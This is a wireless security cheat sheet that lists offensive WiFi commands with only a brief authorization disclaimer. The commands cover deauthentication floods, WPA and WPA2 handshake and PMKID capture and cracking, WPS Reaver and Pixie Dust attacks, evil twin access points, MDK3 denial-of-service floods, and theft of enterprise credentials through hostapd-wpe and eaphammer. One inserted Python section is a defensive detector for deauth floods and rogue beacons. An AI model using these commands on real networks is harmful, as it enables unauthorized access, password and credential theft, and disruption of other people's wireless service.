Wireless Security Cheat Sheet 2026: WiFi Hacking & Analysis

November 9, 2025

Comprehensive wireless security cheat sheet with tools for WiFi testing. Includes aircrack-ng, hcxdumptool, WPA/WPA2/WPA3 cracking, and monitoring techniques.

Wireless security testing requires specialized tools for analyzing and auditing WiFi networks. This cheat sheet covers the essential ones, including aircrack-ng, hcxdumptool and Wireshark, along with techniques for WPA/WPA2/WPA3 testing, monitor mode, packet capture and hash cracking. It is intended for authorized testing of networks you own or have explicit permission to test.

Disclaimer

These tools are for authorized security testing only. Unauthorized access to wireless networks is illegal. Only test networks you own or have explicit permission to test.

Interface Management

Monitor Mode

# Check interface
iwconfig
iw dev

# Kill interfering processes
airmon-ng check kill
systemctl stop NetworkManager
systemctl stop wpa_supplicant

# Enable monitor mode
airmon-ng start wlan0
# Creates wlan0mon

# Manual monitor mode
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# Disable monitor mode
airmon-ng stop wlan0mon

Channel Hopping

# Set specific channel
iwconfig wlan0mon channel 6
iw dev wlan0mon set channel 6

# Channel hopping script
while true; do
  for channel in {1..13}; do
    iw dev wlan0mon set channel $channel
    sleep 1
  done
done

Network Discovery

Airodump-ng

# Basic scan
airodump-ng wlan0mon

# Scan specific channel
airodump-ng -c 6 wlan0mon

# Capture to file
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Show WPS networks
airodump-ng --wps wlan0mon

# 5GHz scan
airodump-ng --band a wlan0mon

Kismet

# Start Kismet
kismet

# CLI mode
kismet_server
kismet_client

WEP Cracking

Aircrack-ng Suite

# Capture IVs
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep wlan0mon

# Fake authentication
aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h YOUR:MAC:ADDR wlan0mon

# ARP replay attack
aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h YOUR:MAC:ADDR wlan0mon

# Crack WEP
aircrack-ng wep-01.cap

WPA/WPA2 Cracking

Capture Handshake

# Start capture
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa wlan0mon

# Deauth clients (force handshake)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon

# Verify handshake
aircrack-ng wpa-01.cap

Dictionary Attack

# Aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-01.cap

# With ESSID
aircrack-ng -w wordlist.txt -e "SSID" wpa-01.cap

Hashcat (GPU acceleration)

# Convert to hashcat format
cap2hccapx wpa-01.cap output.hccapx

# Or use hcxpcapngtool (newer)
hcxpcapngtool -o output.22000 wpa-01.cap

# Crack WPA/WPA2 (hashcat 22000)
hashcat -m 22000 output.22000 wordlist.txt

# With rules
hashcat -m 22000 output.22000 wordlist.txt -r rules/best64.rule

# Mask attack (8-digit numbers)
hashcat -m 22000 output.22000 -a 3 ?d?d?d?d?d?d?d?d

Pyrit (GPU)

# Register ESSID and import wordlist
pyrit -e "SSID" create_essid
pyrit -i wordlist.txt import_passwords

# Batch processing
pyrit batch

# Attack
pyrit -r wpa-01.cap attack_db

WPA3 (SAE) Testing

# Capture with hcxdumptool
hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1

# Convert for cracking
hcxpcapngtool -o hash.22000 capture.pcapng

# Crack (same as WPA2)
hashcat -m 22000 hash.22000 wordlist.txt

WPS Attacks

Reaver

# Basic attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# With delay
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 5

# Pixie dust attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K

# Specific channel
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv

Bully

# Basic attack
bully wlan0mon -b AA:BB:CC:DD:EE:FF -c 6

# Pixie dust
bully wlan0mon -b AA:BB:CC:DD:EE:FF -d -v 3

PixieWPS (standalone)

pixiewps -e PKE -r PKR -s HASH1 -z HASH2 -a AUTHKEY -n E-NONCE

Evil Twin / Rogue AP

Airbase-ng

# Create fake AP
airbase-ng -e "FreeWiFi" -c 6 wlan0mon

# With specific BSSID
airbase-ng -a AA:BB:CC:DD:EE:FF -e "FreeWiFi" -c 6 wlan0mon

Hostapd

# Configuration file
cat > hostapd.conf <<EOF
interface=wlan0
driver=nl80211
ssid=FreeWiFi
channel=6
hw_mode=g
EOF

# Start AP
hostapd hostapd.conf

Fluxion (automated)

# Interactive evil twin attack
./fluxion.sh

Packet Injection Testing

# Test injection
aireplay-ng --test wlan0mon

# Specific AP (same monitor interface as above)
aireplay-ng --test wlan0mon -a AA:BB:CC:DD:EE:FF

Client Attacks

Deauthentication

# Deauth all clients
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon

# Deauth specific client
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon

# Continuous deauth
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon

MDK3

# Beacon flood
mdk3 wlan0mon b -f targetssids.txt

# Deauth
mdk3 wlan0mon d -b blacklist.txt

# Authentication DoS
mdk3 wlan0mon a -a AA:BB:CC:DD:EE:FF

Enterprise (802.1X) Attacks

Hostapd-WPE

# Evil twin for WPA-Enterprise
hostapd-wpe hostapd-wpe.conf

# Captures NTLM hashes and challenge/response
# Found in /var/log/hostapd-wpe.log

EAP-HAMMER

# EAP relay attacks
eaphammer --cert-wizard
eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid "CorpWiFi" --creds

Passive Monitoring

Wireshark

# GUI
wireshark

# Capture on interface
wireshark -i wlan0mon

# Filters
wlan.fc.type_subtype == 0x08  # Beacons
wlan.fc.type_subtype == 0x04  # Probe requests
eapol                           # WPA handshakes

Tshark

# Capture 802.11
tshark -i wlan0mon -w capture.pcap

# Display filter
tshark -r capture.pcap -Y "wlan.fc.type_subtype == 0x08"

# Extract handshakes
tshark -r capture.pcap -Y eapol -w handshakes.pcap
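The same frame-subtype values used in the Wireshark and Tshark filters above (0x08 beacons, 0x0c deauthentication) can be turned into a monitoring check. The following is an added example, not part of the original cheat sheet: it reads the CSV that a `tshark -T fields` export of `frame.time_epoch`, `wlan.fc.type_subtype`, `wlan.bssid` and `wlan.ssid` would produce and flags two things a defender wants to see, a deauth burst from a BSSID and a known SSID being beaconed from a BSSID that is not in the inventory (an evil-twin indicator). The sample records and the inventory set are constructed.

```python
"""Added example: flag deauth floods and look-alike beacons in a tshark export.

Expected input: `tshark -r capture.pcap -T fields -E separator=, \
  -e frame.time_epoch -e wlan.fc.type_subtype -e wlan.bssid -e wlan.ssid`
The SAMPLE below is constructed for illustration, not a real capture.
"""
from collections import defaultdict

BEACON, DEAUTH = 0x08, 0x0C  # wlan.fc.type_subtype values from the filters above

# Constructed records: BSSID aa:bb:... beacons "CorpWiFi", a second BSSID
# advertises the same SSID, then aa:bb:... emits a burst of 25 deauth frames.
SAMPLE = "\n".join(
    ["1700000000.%02d,0x0008,aa:bb:cc:dd:ee:ff,CorpWiFi" % i for i in range(3)]
    + ["1700000000.50,0x0008,11:22:33:44:55:66,CorpWiFi"]
    + ["1700000001.%02d,0x000c,aa:bb:cc:dd:ee:ff," % i for i in range(25)]
)

def parse_records(text):
    """Return (time, subtype, bssid, ssid) tuples; ssid is empty for non-beacons."""
    recs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, sub, bssid, ssid = (line.split(",", 3) + [""])[:4]
        recs.append((float(t), int(sub, 16), bssid.lower(), ssid))
    return recs

def deauth_floods(recs, window=1.0, threshold=10):
    """Map BSSID -> peak deauth count for BSSIDs that send at least `threshold`
    deauth frames within any sliding window of `window` seconds."""
    times = defaultdict(list)
    for t, sub, bssid, _ in recs:
        if sub == DEAUTH:
            times[bssid].append(t)
    peaks = {}
    for bssid, ts in times.items():
        ts.sort()
        start, peak = 0, 0
        for end in range(len(ts)):
            while ts[end] - ts[start] > window:  # slide the window start forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            peaks[bssid] = peak
    return peaks

def ssid_collisions(recs, known_bssids):
    """Map SSID -> sorted BSSIDs beaconing it that are not in the inventory set."""
    seen = defaultdict(set)
    for _, sub, bssid, ssid in recs:
        if sub == BEACON and ssid:
            seen[ssid].add(bssid)
    return {s: sorted(b - known_bssids) for s, b in seen.items() if b - known_bssids}

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print("deauth floods:", deauth_floods(recs))
    print("unknown BSSIDs per SSID:", ssid_collisions(recs, {"aa:bb:cc:dd:ee:ff"}))
```

Feed it a real export with `tshark -r capture.pcap -T fields -E separator=, -e frame.time_epoch -e wlan.fc.type_subtype -e wlan.bssid -e wlan.ssid > frames.csv` and replace SAMPLE with the file contents; the inventory set should come from your own AP list.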

Crunch (Wordlist Generation)

# Generate wordlist
crunch 8 8 0123456789 -o numberlist.txt

# Pattern-based
crunch 10 10 -t @@@@@@%%%% -o list.txt
# @ = lowercase
# , = uppercase
# % = numbers
# ^ = symbols

# Common WiFi patterns
crunch 8 12 0123456789 -o phones.txt

Cowpatty (WPA-PSK)

# Standard attack
cowpatty -r capture.cap -f wordlist.txt -s "SSID"

# With precomputed hashes
cowpatty -r capture.cap -d hashfile -s "SSID"

# Generate hashfile
genpmk -f wordlist.txt -d hashfile -s "SSID"

Wifite (Automated)

# Auto attack
wifite

# WPS only
wifite --wps

# WPA only
wifite --wpa

# Custom wordlist
wifite --dict /path/to/wordlist.txt

Useful One-Liners

# Find hidden SSIDs
airodump-ng wlan0mon --output-format csv -w scan
# Wait for probe responses

# Get clients connected to AP
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF wlan0mon

# Quick handshake capture
timeout 60 airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon & sleep 5 && aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Check if handshake captured
aircrack-ng capture-01.cap | grep handshake

# Convert .cap to .hccapx for hashcat
cap2hccapx capture.cap output.hccapx

# Extract PMKID from capture
hcxpcapngtool -o pmkid.22000 --filter-by=PMKID capture.pcapng

# Generate WPA/WPA2 candidate passwords
crunch 8 63 | aircrack-ng -w - -e "SSID" capture.cap
# RockYou (included in Kali Linux)
/usr/share/wordlists/rockyou.txt

Hardware Recommendations

  • Alfa AWUS036ACH - 802.11ac, monitor mode, injection
  • Alfa AWUS036NHA - 802.11n, reliable, well-supported
  • TP-Link TL-WN722N v1 - Budget option (v2/v3 don’t work)
  • Panda PAU09 N600 - Dual-band
  • WiFi Pineapple - Purpose-built auditing device

Last Updated: March 8, 2026